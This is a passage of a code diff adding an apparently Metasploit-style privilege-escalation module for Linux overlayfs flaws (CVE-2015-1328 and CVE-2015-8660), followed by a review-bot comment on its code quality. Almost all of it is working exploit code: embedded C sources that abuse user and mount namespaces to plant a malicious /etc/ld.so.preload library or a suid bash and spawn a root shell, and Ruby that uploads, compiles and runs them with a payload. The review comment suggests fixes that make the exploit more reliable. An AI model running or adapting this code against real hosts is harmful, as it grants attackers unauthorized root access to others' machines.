\"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n" + + static char child_stack[1024*1024]; + + static int + child_exec(void *stuff) + { + char *file; + system("rm -rf /tmp/ns_sploit"); + mkdir("/tmp/ns_sploit", 0777); + mkdir("/tmp/ns_sploit/work", 0777); + mkdir("/tmp/ns_sploit/upper",0777); + 
mkdir("/tmp/ns_sploit/o",0777); + + fprintf(stderr,"mount #1\n"); + if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { + // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower + if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { + fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); + exit(-1); + } + file = ".access"; + chmod("/tmp/ns_sploit/work/work",0777); + } else file = "ns_last_pid"; + + chdir("/tmp/ns_sploit/o"); + rename(file,"ld.so.preload"); + + chdir("/"); + umount("/tmp/ns_sploit/o"); + fprintf(stderr,"mount #2\n"); + if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { + if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { + exit(-1); + } + chmod("/tmp/ns_sploit/work/work",0777); + } + + chmod("/tmp/ns_sploit/o/ld.so.preload",0777); + umount("/tmp/ns_sploit/o"); + } + + int + main(int argc, char **argv) + { + int status, fd, lib; + pid_t wrapper, init; + int clone_flags = CLONE_NEWNS | SIGCHLD; + + fprintf(stderr,"spawning threads\n"); + + if((wrapper = fork()) == 0) { + if(unshare(CLONE_NEWUSER) != 0) + fprintf(stderr, "failed to create new user namespace\n"); + + if((init = fork()) == 0) { + pid_t pid = + clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); + if(pid < 0) { + fprintf(stderr, "failed to create new mount namespace\n"); + exit(-1); + } + + waitpid(pid, &status, 0); + + } + + waitpid(init, &status, 0); + return 0; + } + + usleep(300000); + + wait(NULL); + + fprintf(stderr,"child threads done\n"); + + fd = open("/etc/ld.so.preload",O_WRONLY); + + if(fd == -1) { + fprintf(stderr,"exploit failed\n"); + exit(-1); + } + + 
fprintf(stderr,"/etc/ld.so.preload created\n"); + fprintf(stderr,"creating shared library\n"); + lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); + write(lib,LIB,strlen(LIB)); + close(lib); + lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); + if(lib != 0) { + fprintf(stderr,"couldn't create dynamic library\n"); + exit(-1); + } + write(fd,"/tmp/ofs-lib.so\n",16); + close(fd); + system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); + execl("/bin/su","su",NULL); + } + } + + # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size + # Exploit Title: overlayfs local root + # Date: 2016-01-05 + # Exploit Author: rebel + # Version: Ubuntu 14.04 LTS, 15.10 and more + # Tested on: Ubuntu 14.04 LTS, 15.10 + # CVE : CVE-2015-8660 + cve_2015_8660 = %q{ + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + static char child_stack[1024*1024]; + + static int + child_exec(void *stuff) + { + system("rm -rf /tmp/haxhax"); + mkdir("/tmp/haxhax", 0777); + mkdir("/tmp/haxhax/w", 0777); + mkdir("/tmp/haxhax/u",0777); + mkdir("/tmp/haxhax/o",0777); + + if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) { + fprintf(stderr,"mount failed..\n"); + } + + chmod("/tmp/haxhax/w/work",0777); + chdir("/tmp/haxhax/o"); + chmod("bash",04755); + chdir("/"); + umount("/tmp/haxhax/o"); + return 0; + } + + int + main(int argc, char **argv) + { + int status; + pid_t wrapper, init; + int clone_flags = CLONE_NEWNS | SIGCHLD; + struct stat s; + + if((wrapper = fork()) == 0) { + if(unshare(CLONE_NEWUSER) != 0) + fprintf(stderr, "failed to create new user namespace\n"); + + if((init = fork()) == 0) { + pid_t pid = + clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); + if(pid < 0) { + 
fprintf(stderr, "failed to create new mount namespace\n"); + exit(-1); + } + + waitpid(pid, &status, 0); + + } + + waitpid(init, &status, 0); + return 0; + } + + usleep(300000); + + wait(NULL); + + stat("/tmp/haxhax/u/bash",&s); + + if(s.st_mode == 0x89ed) + execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL); + + fprintf(stderr,"couldn't create suid :(\n"); + return -1; + } + } + + filename = rand_text_alphanumeric(8) + executable_path = "#{datastore['WritableDir']}/#(unknown)" + payloadname = rand_text_alphanumeric(8) + payload_path = "#{datastore['WritableDir']}/#{payloadname}" + + def has_prereqs?() + gcc = cmd_exec('which gcc') + if gcc.include?('gcc') + vprint_good('gcc is installed') + else + print_error('gcc is not installed. Compiling will fail.') + end + return gcc.include?('gcc') + end + + compile = false + if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' + if has_prereqs?() + compile = true + vprint_status('Live compiling exploit on system') + else + vprint_status('Dropping pre-compiled exploit on system') + end + end + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') + end + + def upload_and_chmod(fname,fcontent) + print_status "Writing to #{fname} (#{fcontent.size} bytes)" + rm_f fname + write_file(fname, fcontent) + cmd_exec("chmod +x #{fname}") + #register_file_for_cleanup(fname) + end + + def on_new_session(session) + super + if target.name == 'CVE-2015-1328' + session.shell_command("/bin/su") #this doesnt work on meterpreter????? 
+ end + end + + if compile + if target.name == 'CVE-2015-1328' + cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/, + "execl(\"#{payload_path}\",\"#{payloadname}\",NULL);") + upload_and_chmod("#{executable_path}.c", cve_2015_1328) + else + cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/, + "os.execl('#{payload_path}','#{payloadname}')") + upload_and_chmod("#{executable_path}.c", cve_2015_8660) + end + vprint_status("Compiling #{executable_path}.c") + cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile + register_file_for_cleanup(executable_path) + else + if target.name == 'CVE-2015-1328' + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', '1328') + fd = ::File.open( path, "rb") + cve_2015_1328 = fd.read(fd.stat.size) + fd.close + upload_and_chmod(executable_path, cve_2015_1328) + # overwrite with the hardcoded variable names in the compiled versions + payload_filename = 'cjKriIIN' + payload_path = '/tmp/cjKriIIN' + else + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660') + fd = ::File.open( path, "rb") + cve_2015_8660 = fd.read(fd.stat.size) + fd.close + upload_and_chmod(executable_path, cve_2015_8660) + # overwrite with the hardcoded variable names in the compiled versions + payload_filename = '1H0qLaq2' + payload_path = '/tmp/1H0qLaq2' + end + end + + upload_and_chmod(payload_path, generate_payload_exe) + vprint_status('Exploiting...') + output = cmd_exec(executable_path) + output.each_line { |line| vprint_status(line.chomp) } + end +end
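Review bot: `exploit` calls `check` twice — once at its top and again right after the `has_prereqs?` block — so every `cmd_exec` in `mounts_exist?` and `kernel_vuln?` is sent to the session a second time (the documentation log in this commit shows 'Checking if mount points exist' printed twice per run); delete the second `if check != CheckCode::Appears` block. The `def mounts_exist?()`, `def kernel_vuln?()`, `def has_prereqs?()`, `def upload_and_chmod` and `def on_new_session` nested inside `check` and `exploit` are not local closures: a `def` executed inside a method defines a public instance method on the class as a side effect every time the enclosing method runs, so they belong at class level (`on_new_session` public because the framework calls it, the rest under `private`). `Gem::Version.new(cmd_exec('/bin/uname -r'))` raises ArgumentError on anything that is not a version string (an error line from the shell, a missing binary), which turns `check` into an exception instead of `CheckCode::Safe`; capture `raw = cmd_exec('/bin/uname -r').strip` and `return false unless Gem::Version.correct?(raw)` before building the version. In the pre-compiled branch `payload_path` is hard-set to `/tmp/cjKriIIN` / `/tmp/1H0qLaq2` (and `payload_filename` is assigned but never read), silently ignoring `WritableDir`, and the embedded CVE-2015-1328 source still shells out to `gcc` at run time, so that target cannot succeed on the very hosts where `has_prereqs?` found no compiler — a `fail_with(Failure::BadConfig, ...)` in those two cases would replace a late, opaque failure with a clear one. `executable_path = "#{datastore['WritableDir']}/#(unknown)"` as rendered here never uses `filename`; presumably `#{filename}` was intended.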